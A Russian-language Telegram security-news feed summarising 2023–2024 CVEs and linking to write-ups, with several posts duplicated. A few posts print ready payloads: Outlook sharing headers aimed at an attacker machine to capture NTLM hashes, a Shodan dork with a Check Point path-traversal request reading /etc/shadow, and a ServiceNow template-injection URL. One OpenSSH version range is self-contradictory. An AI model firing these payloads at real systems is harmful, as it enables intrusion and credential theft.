Команда Varonis обнаружила новую багу в функции обмена календарями в Microsoft Outlook, при котором добавление двух заголовков в электронное письмо заставляет Outlook делиться контентом и связываться с указанной машиной, создавая возможность перехвата хэша NTLM v2.
К слову, это новый способ получения NTLM-хэшей среди двух других новых способов: с помощью Windows Performance Analyzer и проводника Windows.
Для тех, кто не знает, NTLM v2 — это криптографический протокол, используемый Windows для аутентификации пользователей на удаленных серверах. Хотя NTLM v2 является более безопасной версией оригинального NTLM, v2 все еще уязвим для атак методом брутфорса и не только.
📌 Те самые заголовки Outlook:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Всеволод Кокорин, исследователь безопасности в SolidLab, делится историей нахождения уязвимости и описывает технические аспекты, которые привели к её возникновению. Сама уязвимость существовала в течение длительного времени и была устранена в октябре 2023 года.
📌 Вы узнаете про Service Worker + PWA, про аспекты, связанные с Payment Request API и спецификацией JIT-installed воркеров, а также про то, как архитектурные решения в веб-приложениях могут привести к серьезным багам.
👉 Читать
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🛠 Шаблоны Nuclei в январе 2024: что нового для этичного хакера
⚡️ За месяц команда ProjectDiscovery и сообщество написали 157 новых шаблонов Nuclei, из которых 36 CVE и 75 для сканирования багов, связанных с локальным повышением привилегий:
✅ CVE-2023-22527: Atlassian Confluence — Remote Code Execution
✅ CVE-2023-44353: Adobe ColdFusion WDDX Deserialization Gadgets
✅ CVE-2023-51467: Apache OFBiz < 18.12.11 — Remote Code Execution
✅ CVE-2023-7028: GitLab — Account Takeover via Password Reset
✅ CVE-2024-0204: Fortra GoAnywhere MFT — Authentication Bypass
✅ CVE-2024-23897: Jenkins < 2.441 — Arbitrary File Read
✅ CVE-2023-50917: MajorDoMo thumb.php — OS Command Injection
✅ CVE-2023-46805: Ivanti ICS — Authentication Bypass
✅ CVE-2023-47211: ManageEngine OpManager — Directory Traversal
✅ CVE-2023-6063: WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection
#news #pentest #bugbounty #CVE
⚡️ За месяц команда ProjectDiscovery и сообщество написали 157 новых шаблонов Nuclei, из которых 36 CVE и 75 для сканирования багов, связанных с локальным повышением привилегий:
✅ CVE-2023-22527: Atlassian Confluence — Remote Code Execution
✅ CVE-2023-44353: Adobe ColdFusion WDDX Deserialization Gadgets
✅ CVE-2023-51467: Apache OFBiz < 18.12.11 — Remote Code Execution
✅ CVE-2023-7028: GitLab — Account Takeover via Password Reset
✅ CVE-2024-0204: Fortra GoAnywhere MFT — Authentication Bypass
✅ CVE-2024-23897: Jenkins < 2.441 — Arbitrary File Read
✅ CVE-2023-50917: MajorDoMo thumb.php — OS Command Injection
✅ CVE-2023-46805: Ivanti ICS — Authentication Bypass
✅ CVE-2023-47211: ManageEngine OpManager — Directory Traversal
✅ CVE-2023-6063: WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection
#news #pentest #bugbounty #CVE
🤦♂️🔐 1 февраля этого года компания Ivanti объявила о закрытии серьезных уязвимостей в своих продуктах Ivanti Connect Secure и Ivanti Policy Secure. Эти уязвимости, обнаруженные в декабре 2023 года, уже активно эксплуатировались злоумышленниками, представляя значительную угрозу для VPN-серверов. Сложности с разработкой патча привели к тому, что CISA потребовало отключить уязвимые решения за день до выпуска обновлений. Это уже второй серьезный инцидент с продуктами Ivanti, предыдущий произошел в августе 2023 года.
Команда Volexity обнаружила две уязвимости (CVE-2023-46805 и CVE-2024-21887) в VPN-сервере, позволяющие обходить аутентификацию и выполнять произвольные команды. После публикации информации об уязвимостях количество атак значительно увеличилось. Ivanti предложила временные решения, но некоторые из них были обойдены атакующими. В конечном итоге, для полной защиты требовалась переустановка ПО с нуля и установка патча.
Естественно, команду Assetnote эти уязвимости заинтересовали. Их исследования, реверс прошивки и многое другое — под катом:
⚡️High Signal Detection and Exploitation of Ivanti's Pulse Connect Secure Auth Bypass RCE
⚡️Ivanti's Pulse Connect Secure Auth Bypass Round Two
#pentest #reverse #CVE
Команда Volexity обнаружила две уязвимости (CVE-2023-46805 и CVE-2024-21887) в VPN-сервере, позволяющие обходить аутентификацию и выполнять произвольные команды. После публикации информации об уязвимостях количество атак значительно увеличилось. Ivanti предложила временные решения, но некоторые из них были обойдены атакующими. В конечном итоге, для полной защиты требовалась переустановка ПО с нуля и установка патча.
Естественно, команду Assetnote эти уязвимости заинтересовали. Их исследования, реверс прошивки и многое другое — под катом:
⚡️High Signal Detection and Exploitation of Ivanti's Pulse Connect Secure Auth Bypass RCE
⚡️Ivanti's Pulse Connect Secure Auth Bypass Round Two
#pentest #reverse #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯 Анализ новой уязвимости Linux в nf_tables (CVE-2024-1086)
🤷♂️ Ничего такого, просто ядра Linux (5.14–6.7) подвержены уязвимости Local Privilege Escalation. А это самые распространенных ОС Debian и Ubuntu.
Автор написал своего рода исследование, в котором поделился первопричинами уязвимости и универсальным PoC'ом.
Материал отлично подойдет для новичков, которые хотят научиться искать баги в ядре Linux, потому что сложные темы разбиты на разделы (к которым можно вернуться, если совсем непонятно) и написаны простым языком.
👉 Читать
#research #linux #CVE
🤷♂️ Ничего такого, просто ядра Linux (5.14–6.7) подвержены уязвимости Local Privilege Escalation. А это самые распространенных ОС Debian и Ubuntu.
Автор написал своего рода исследование, в котором поделился первопричинами уязвимости и универсальным PoC'ом.
Материал отлично подойдет для новичков, которые хотят научиться искать баги в ядре Linux, потому что сложные темы разбиты на разделы (к которым можно вернуться, если совсем непонятно) и написаны простым языком.
#research #linux #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Все пишут про CVE-2024-24919, и мы напишем.
🔍 Дорк для Shodan:
Эксплуатация👇
#CVE
title:"Check Point" ssl:"target"
Эксплуатация👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🌐 Введение в эксплуатацию Chrome
Где одни из самых крупных выплат? Конечно, в браузерах. Читайте подробнее полезные заметки, которые уже переросли в глубокое исследование.
1. Introduction
2. The Chromium Security Architecture
3. The V8 Pipeline
• The Parser
• The Interpreter - Ignition
• The JIT Compiler - TurboFan
• The Maglev Compiler
4. Setting up the V8 Debugging Environment
5. CVE-2023-4069 RCA and Walkthrough
6. JIT-Spraying Shellcode
7. Addendum: Version Independent Shellcode
8. Conclusions
9. External References
👉 Читать
#research
Где одни из самых крупных выплат? Конечно, в браузерах. Читайте подробнее полезные заметки, которые уже переросли в глубокое исследование.
1. Introduction
2. The Chromium Security Architecture
3. The V8 Pipeline
• The Parser
• The Interpreter - Ignition
• The JIT Compiler - TurboFan
• The Maglev Compiler
4. Setting up the V8 Debugging Environment
5. CVE-2023-4069 RCA and Walkthrough
6. JIT-Spraying Shellcode
7. Addendum: Version Independent Shellcode
8. Conclusions
9. External References
👉 Читать
#research
🤯⚡️ regreSSHion: удаленная уязвимость pre-auth RCE в OpenSSH сервере
Что еще может перевернуть обычный день в ИБ-сообществе, как не критическая уязвимость в популярном сервисе?
Уязвимость получила идентификатор CVE-2024-6387 и затрагивает OpenSSH (с версии >= 8.5 и < 4.4). Она позволяет удалённо выполнить код с правами root в Linux-системах на базе glibc.
👉 Читать исследование
#research #CVE
Что еще может перевернуть обычный день в ИБ-сообществе, как не критическая уязвимость в популярном сервисе?
Уязвимость получила идентификатор CVE-2024-6387 и затрагивает OpenSSH (с версии >= 8.5 и < 4.4). Она позволяет удалённо выполнить код с правами root в Linux-системах на базе glibc.
👉 Читать исследование
#research #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
💰 Magento XXE в деталях (CVE-2024-34102)
Команда Assetnode провела очередную блестящую работу, воспроизведя недавнюю pre-authentication XML entity injection в Magento. Автор уязвимости — Сергей Темников. Его исследование можно прочитать здесь, но оно не содержит пруфов.
👉 Читать
#writeup #CVE
Команда Assetnode провела очередную блестящую работу, воспроизведя недавнюю pre-authentication XML entity injection в Magento. Автор уязвимости — Сергей Темников. Его исследование можно прочитать здесь, но оно не содержит пруфов.
👉 Читать
#writeup #CVE
🤯 Объединение трех багов для доступа ко всем данным ServiceNow
В ходе пентеста команда Assetnote обнаружила три критические проблемы в ServiceNow, которые позволяли выполнять произвольный код без аутентификации и получать доступ к данным для инстансов ServiceNow. Читайте подробнее райтап и ход мыслей исследователя👇
Итоговый пэйлоад:
⛓️💥 Читать
#writeup #pentest #CVE
В ходе пентеста команда Assetnote обнаружила три критические проблемы в ServiceNow, которые позволяли выполнять произвольный код без аутентификации и получать доступ к данным для инстансов ServiceNow. Читайте подробнее райтап и ход мыслей исследователя👇
Итоговый пэйлоад:
http://host/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>
⛓️💥 Читать
#writeup #pentest #CVE
Вы же знаете про Ghostscript? Это инструмент, который используется для предварительного просмотра и печати документов в формате PostScript/PDF. Естественно, его под капотом используют в веб-приложениях для рендеринга PDF-документов. Вы даже можете не знать, что веб-приложение его использует 🤔
Команда Codean Labs опубликовала уже второе исследование по теме — читайте, учитесь и вдохновляйтесь:
1️⃣ CVE-2024-29510 — Exploiting Ghostscript using format strings
2️⃣ CVE-2024-29511 — Abusing Ghostscript’s OCR device
#CVE #writeup
Команда Codean Labs опубликовала уже второе исследование по теме — читайте, учитесь и вдохновляйтесь:
#CVE #writeup
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
theori.io
Deep Dive into RCU Race Condition: Analysis of TCP-AO UAF (CVE-2024–27394) - Theori BLOG
CVE-2024-27394 is a TCP-AO Use-After-Free vulnerability caused by improper RCU API usage. Read the in-depth analysis and reliable triggering technique. | Vulnerability Research
Разработчики GitLab выпустили патчи для устранения нескольких уязвимостей, наиболее серьезная из которых (CVE-2024-6678) при определенных условиях позволяет злоумышленнику запускать пайплайны от имени любого пользователя.
Пайплайны GitLab являются частью системы CI/CD, которая позволяет пользователям автоматически запускать процессы и задачи параллельно или последовательно для сборки, тестирования или деплоя изменений в коде.
За последние месяцы GitLab уже не первый раз устраняет связанные с пайплайнами баги. Так, в июле 2024 года была устранена критическая проблема CVE-2024-6385, а в июне — CVE-2024-5655.
👉 Подробнее
#CVE #security
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🥷 Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409)
Зачем изучать различные CVE? Хотя бы за тем, чтобы расширить кругозор в нашем сложном ремесле и понимать предпосылки возникновения багов. Сегодня для вас очередная критическая уязвимость в GitLab, позволяющая обойти механизмы аутентификации SAML и получить несанкционированный доступ, используя недостаток в обработке ответов SAML.
👉 Читать
#CVE #writeup
Зачем изучать различные CVE? Хотя бы за тем, чтобы расширить кругозор в нашем сложном ремесле и понимать предпосылки возникновения багов. Сегодня для вас очередная критическая уязвимость в GitLab, позволяющая обойти механизмы аутентификации SAML и получить несанкционированный доступ, используя недостаток в обработке ответов SAML.
👉 Читать
#CVE #writeup
🔥 Fortinet FortiGate CVE-2024-23113: суперсложная уязвимость в суперзащищенном устройстве в 2024 году
Исследователи из лаборатории Watchtowr обнаружили очередную уязвимость в SSL VPN.
👉 Читать райтап
#writeup #CVE
Исследователи из лаборатории Watchtowr обнаружили очередную уязвимость в SSL VPN.
👉 Читать райтап
#writeup #CVE